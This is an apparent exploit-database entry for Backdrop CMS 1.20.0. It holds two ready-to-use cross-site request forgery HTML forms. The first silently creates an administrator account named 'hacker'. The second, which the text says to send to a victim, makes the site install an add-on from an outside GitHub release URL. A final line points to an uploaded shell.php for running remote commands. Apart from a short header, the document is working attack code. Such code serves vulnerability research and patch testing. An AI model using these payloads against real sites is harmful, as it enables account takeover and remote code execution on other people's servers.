c18c22e3d9
8 changes to exploits/shellcodes Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC) Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF) WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) Budget and Expense Tracker System 1.0 - Arbitrary File Upload Police Crime Record Management Project 1.0 - Time Based SQLi
232 lines
No EOL
19 KiB
HTML
232 lines
No EOL
19 KiB
HTML
# Exploit Title: Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
|
|
# Exploit Author: V1n1v131r4
|
|
# Date: 2021-09-22
|
|
# Vendor Homepage: https://backdropcms.org/
|
|
# Software Link: https://github.com/backdrop/backdrop/releases/download/1.20.0/backdrop.zip
|
|
# Version: 1.20.0
|
|
# Tested On: Kali Linux, Ubuntu 20.04
|
|
# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to add new user with Admin powers.
|
|
# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously add-on with crafted PHP file.
|
|
|
|
<html>
|
|
<body>
|
|
<form method="POST" action="http://example.com/backdrop/?q=admin/people/create">
|
|
<input type="text" name="q" value="admin/people/create">
|
|
<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
|
|
<input type="text" name="name" value="hacker">
|
|
<input type="text" name="mail" value="hacker@hacker.com">
|
|
<input type="text" name="notify" value="1">
|
|
<input type="text" name="pass" value="admin">
|
|
<input type="text" name="form_build_id" value="form-fPIKc40E3Yp2JOBgAd6gFbMJFsihncTANLNRWwPRWIY">
|
|
<input type="text" name="form_token" value="AtrGRG9-8zS8-GoKbYL3niPjqnZP2zTirEqB4E_kS9I">
|
|
<input type="text" name="form_id" value="user_register_form">
|
|
<input type="text" name="status" value="1">
|
|
<input type="text" name="roles[administrator]" value="administrator">
|
|
<input type="text" name="op" value="Create new account">
|
|
<input type="submit" value="Send">
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
# Step 1
|
|
# Send this page below to the victim
|
|
|
|
<html>
|
|
<body>
|
|
<form method="POST" action="http://example.com/backdrop/?q=system/ajax">
|
|
<input type="text" name="q" value="system/ajax">
|
|
<input type="text" name="Backdrop.tableDrag.showWeight" value="0">
|
|
<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
|
|
<input type="text" name="bulk" value="">
|
|
<input type="text" name="project_url" value="https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS/releases/download/backdrop/reference.tar">
|
|
<input type="text" name="files[project_upload]" value="">
|
|
<input type="text" name="form_build_id" value="form-p-BrvXTDPqUhhAatHFr4d_dQKt6Dn5d-mIf4hwFyuJA">
|
|
<input type="text" name="form_token" value="aYigpmZz3OXNHnjJTO2Tu43IXMKyrMXvB2yL-4NFbTw">
|
|
<input type="text" name="form_id" value="installer_manager_install_form">
|
|
<input type="text" name="_triggering_element_name" value="op">
|
|
<input type="text" name="_triggering_element_value" value="Install">
|
|
<input type="text" name="ajax_html_ids[]" value="skip-link">
|
|
<input type="text" name="ajax_html_ids[]" value="main-content">
|
|
<input type="text" name="ajax_html_ids[]" value="installer-browser-filters-form">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-search-text">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-submit">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-bootstrap_lite">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-corporate_kiss">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lateral">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-colihaut">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-shasetsu">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-borg">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-pelerine">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-cleanish">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-materialize">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lumi">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-tatsu">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-mero">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-snazzy">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-afterlight_tribute">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-minicss">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-zurb_foundation_6">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-thesis">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-summer_fun">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-news_arrow">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-ajax">
|
|
<input type="text" name="ajax_html_ids[]" value="title-link">
|
|
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-basis_contrib">
|
|
<input type="text" name="ajax_html_ids[]" value="installer-browser-manual-install-link">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-link">
|
|
<input type="text" name="ajax_html_ids[]" value="admin-bar">
|
|
<input type="text" name="ajax_html_ids[]" value="admin-bar-wrapper">
|
|
<input type="text" name="ajax_html_ids[]" value="admin-bar-icon">
|
|
<input type="text" name="ajax_html_ids[]" value="admin-bar-menu">
|
|
<input type="text" name="ajax_html_ids[]" value="admin-bar-extra">
|
|
<input type="text" name="ajax_html_ids[]" value="admin-bar-search-items">
|
|
<input type="text" name="ajax_html_ids[]" value="ui-id-1">
|
|
<input type="text" name="ajax_html_ids[]" value="backdrop-modal">
|
|
<input type="text" name="ajax_html_ids[]" value="installer-manager-install-form">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-bulk-wrapper">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-bulk">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-project-url-wrapper">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-project-url">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-project-upload-wrapper">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-project-upload">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-actions">
|
|
<input type="text" name="ajax_html_ids[]" value="edit-submit--2">
|
|
<input type="text" name="ajax_page_state[theme]" value="seven">
|
|
<input type="text" name="ajax_page_state[theme_token]" value="RY9h420qjWmejTKFp7C0ytS__FtpWnVmEjVCnHWFblo">
|
|
<input type="text" name="ajax_page_state[css][core/misc/normalize.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.theme.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/system/css/messages.theme.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.admin.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/layout/css/grid-flexbox.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/contextual/css/contextual.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/comment/css/comment.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/date/css/date.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/field/css/field.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/search/search.theme.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/user/css/user.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/views/css/views.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar-print.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/layouts/boxton/boxton.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/modules/installer/css/installer.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/themes/seven/css/seven.base.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/themes/seven/css/style.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/themes/seven/css/responsive-tabs.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/misc/opensans/opensans.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.core.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.button.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.draggable.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.resizable.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.dialog.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/misc/dialog.theme.css]" value="1">
|
|
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.theme.css]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/html5.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/jquery.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/jquery-extend-3.4.0.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/jquery-html-prefilter-3.5.0.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/jquery.once.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/backdrop.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/modules/layout/js/grid-fallback.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ajax.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/jquery.form.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/modules/contextual/js/contextual.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/form.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/modules/admin_bar/js/admin_bar.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/modules/installer/js/installer.project_list.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/progress.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/tableheader.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/dismiss.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/themes/seven/js/script.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.data.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.disable-selection.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.labels.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.scroll-parent.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.tabbable.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.unique-id.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.version.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.escape-selector.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.focusable.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form-reset-mixin.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.ie.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.keycode.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.plugin.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-active-element.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-blur.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.widget.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/textarea.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.button.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.mouse.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/jquery.ui.touch-punch.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.draggable.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.position.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.resizable.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.dialog.min.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/dialog.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/dialog.ajax.js]" value="1">
|
|
<input type="text" name="ajax_page_state[js][core/misc/collapse.js]" value="1">
|
|
<input type="submit" value="Send">
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
Run on your browser: http://example.com/backdrop/modules/reference/shell.php?cmd=[command] to execute remote commands. |